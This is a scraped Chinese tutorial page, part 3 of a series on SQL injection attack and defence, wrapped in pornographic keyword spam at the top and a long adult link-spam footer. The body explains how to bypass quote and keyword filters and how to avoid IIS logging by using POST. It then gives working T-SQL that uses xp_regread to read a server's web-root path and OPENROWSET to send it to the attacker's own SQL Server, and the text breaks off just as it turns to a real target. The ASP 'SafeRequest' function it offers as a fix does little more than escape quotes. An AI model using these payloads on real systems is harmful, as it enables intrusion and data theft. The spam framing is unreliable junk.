<em id="0a85b"><option id="0a85b"></option></em>

<abbr id="0a85b"></abbr>

      <nobr id="0a85b"></nobr>
        <tr id="0a85b"></tr>
        9久久伊人精品综合,亚洲一区精品视频在线,成 人免费va视频,国产一区二区三区黄网,99国产精品永久免费视频,亚洲毛片多多影院,精品久久久无码人妻中文字幕,无码国产欧美一区二区三区不卡
        學習啦>學習電腦>電腦安全>網絡安全知識>

        SQL注入漏洞的攻防策略(3)

        時間: 若木632 分享

          第二節、繞過程序限制繼續注入

          在入門篇提到,有很多人喜歡用’號測試注入漏洞,所以也有很多人用過濾’號的方法來“防止”注

          入漏洞,這也許能擋住一些入門者的攻擊,但對SQL注入比較熟悉的人,還是可以利用相關的函數,達到

          繞過程序限制的目的。

          在“SQL注入的一般步驟”一節中,我所用的語句,都是經過我優化,讓其不包含有單引號的;在“

          利用系統表注入SQLServer數據庫”中,有些語句包含有’號,我們舉個例子來看看怎么改造這些語句:

          簡單的如where xtype=’U’,字符U對應的ASCII碼是85,所以可以用where xtype=char(85)代替;

          如果字符是中文的,比如where name=’用戶’,可以用where name=nchar(29992)+nchar(25143)代替。

          第三節、經驗小結

          1.有些人會過濾Select、Update、Delete這些關鍵字,但偏偏忘記區分大小寫,所以大家可以用sele

          cT這樣嘗試一下。

          2.在猜不到字段名時,不妨看看網站上的登錄表單,一般為了方便起見,字段名都與表單的輸入框取

          相同的名字。

          3.特別注意:地址欄的+號傳入程序后解釋為空格,%2B解釋為+號,%25解釋為%號,具體可以參考URL

          Encode的相關介紹。

          4.用Get方法注入時,IIS會記錄你所有的提交字符串,對Post方法做則不記錄,所以能用Post的網址

          盡量不用Get。

          5. 猜解Access時只能用Ascii逐字解碼法,SQLServer也可以用這種方法,只需要兩者之間的區別即

          可,但是如果能用SQLServer的報錯信息把值暴露出來,那效率和準確率會有極大的提高。

          防范方法

          SQL注入漏洞可謂是“千里之堤,潰于蟻穴”,這種漏洞在網上極為普遍,通常是由于程序員對注入

          不了解,或者程序過濾不嚴格,或者某個參數忘記檢查導致。在這里,我給大家一個函數,代替ASP中的R

          equest函數,可以對一切的SQL注入Say NO,函數如下:

          Function SafeRequest(ParaName,ParaType)

          '--- 傳入參數 ---

          'ParaName:參數名稱-字符型

          'ParaType:參數類型-數字型(1表示以上參數是數字,0表示以上參數為字符)

          Dim Paravalue

          Paravalue=Request(ParaName)

          If ParaType=1 then

          If not isNumeric(Paravalue) then

          Response.write "參數" & ParaName & "必須為數字型!"

          Response.end

          End if

          Else

          Paravalue=replace(Paravalue,"'","''")

          End if

          SafeRequest=Paravalue

          End function

          不管你是安全人員、技術愛好者還是程序員,我都希望本文能對你有所幫助。

          SQL注入攻擊常見方法和技巧

          知己知披 方能百戰百勝;“黑客”們采用的攻擊方法雷同,下面是我挑選的一些具有代表性的攻擊方法

          ,分析這些方法有助于程序員們編寫更少漏洞的程序。

          跨站式SQL注入數據庫攻擊和防范技巧

          前一階段,在嘗試攻擊一個網站的時候,發現對方的系統已經屏蔽了錯誤信息,用的也是普通的帳號連接

          的數據庫,系統也是打了全部的補丁這樣要攻擊注入是比較麻煩的。因此我自己搞了一種“跨站式SQL注

          入”。

          思路如下,既然你不顯示錯誤信息,我能不能讓你顯示到別的地方呢?讓SQL把錯誤寫入別的地方。

          既然是研究階段,我們最好不要直接注入網站,而是首先用查詢分析器來分析這個方法。

          第一個想法:

          SQL可以連接外部的數據庫。

          于是,首先用查詢分析器,登陸到我自己的一個虛擬主機的數據庫(這樣的權限比較小),然后在本

          地啟動一個SQL server,并且用SA的身份在SQL事件探測器里邊建立一個跟蹤。

          嘗試 sp_addlinkedserver 如果成功,那就和操作本地數據庫一樣了。

          提示必須是sysadmin的身份。。失敗。

          換一個思路:

          只要你SQL敢發命令過來,我不管執行的結果怎么樣,只要接獲到命令就可以了。

          于是考慮到一個權限要求不是很高的命令:OPENROWSET 來跨服務器查詢。這個命令作用是把一個數

          據庫命令發給遠程的數據庫,取回來結果集。。于是就啟動“事件跟蹤”監視發過來的命令。

          第一次嘗試,首先還是執行 create table [dbo].[laokai]([cha8][char](255))--建立一個表。隨

          后是把路徑寫入數據庫,這里我考慮,直接生成一個跨庫的腳本算了。好方便執行。。

          DECLARE @result varchar(255) exec master.dbo.xp_regread

          'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/'

          ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''

          你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result +

          ''''''')AS a');--

          這段代碼什么意思哪?就是把網站的路徑信息寫入數據庫。也不是單純的寫,寫得同時構造一個SQL

          語句,這個語句的執行結果是給laokai這個數據庫的cha8字段增加了這樣的一行記錄。

          SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors

          where au_fname=''C:/Inetpub,,1''')AS a

          其中的C:/Inetpub,,1就是注冊表記錄的根目錄,最后要做的是:

          DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--

          這樣就等于執行了

          SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors

          where au_fname=''C:/Inetpub,,1''')AS a

          這一條語句,同時你會在事件探測器那邊會顯示

          SELECT * FROM pubs.dbo.authors where au_fname='C:/Inetpub,,1'

          其中的C:/Inetpub 就是網站的路徑。。調試成功。。

          現在進入實戰階段。某網站屏蔽了全部出錯信息。但是我們可以確定它存在注入點 a.asp?id=1,怎么做呢?

        75367 主站蜘蛛池模板: 免费看视频的网站| 91精品亚洲一区二区三区| 一个人免费观看WWW在线视频| 亚洲av一本二本三本| 97久久精品无码一区二区| 国产一区二区三区地址| 午夜国产精品福利一二| 国产精品一二二区视在线| 亚洲国产成人无码网站| 人妻聚色窝窝人体WWW一区| 日本一区二区三区四区黄色| 国产一区二区不卡在线| 国产va免费精品观看精品| 一区二区三区激情都市| 国产一区二区精品高清在线观看| 丰满人妻一区二区三区色| 亚洲欧洲一区二区精品| 国产综合色产在线精品| 狠狠色噜噜狠狠狠狠av不卡| 专区亚洲欧洲日产国码AV| 日韩中文字幕精品人妻| 欧洲码亚洲码的区别入口| 成人免费无遮挡在线播放| 久久中文字幕日韩无码视频| 亚洲另类无码一区二区三区| 国产自在自线午夜精品| 九九热在线免费播放视频| 丰满的熟妇岳中文字幕| 久久久久久av无码免费看大片| 少妇精品视频一码二码三| 精品国产乱一区二区三区| 国产精品福利自产拍久久 | 亚洲国产成人久久精品APP| av在线播放国产一区| 免费高清特级毛片A片| 国产精品7m凸凹视频分类大全| 国产精品久久中文字幕| 国产欧美日韩综合精品二区| 国内精品自线在拍| 亚洲人成色4444在线观看| 蜜芽久久人人超碰爱香蕉|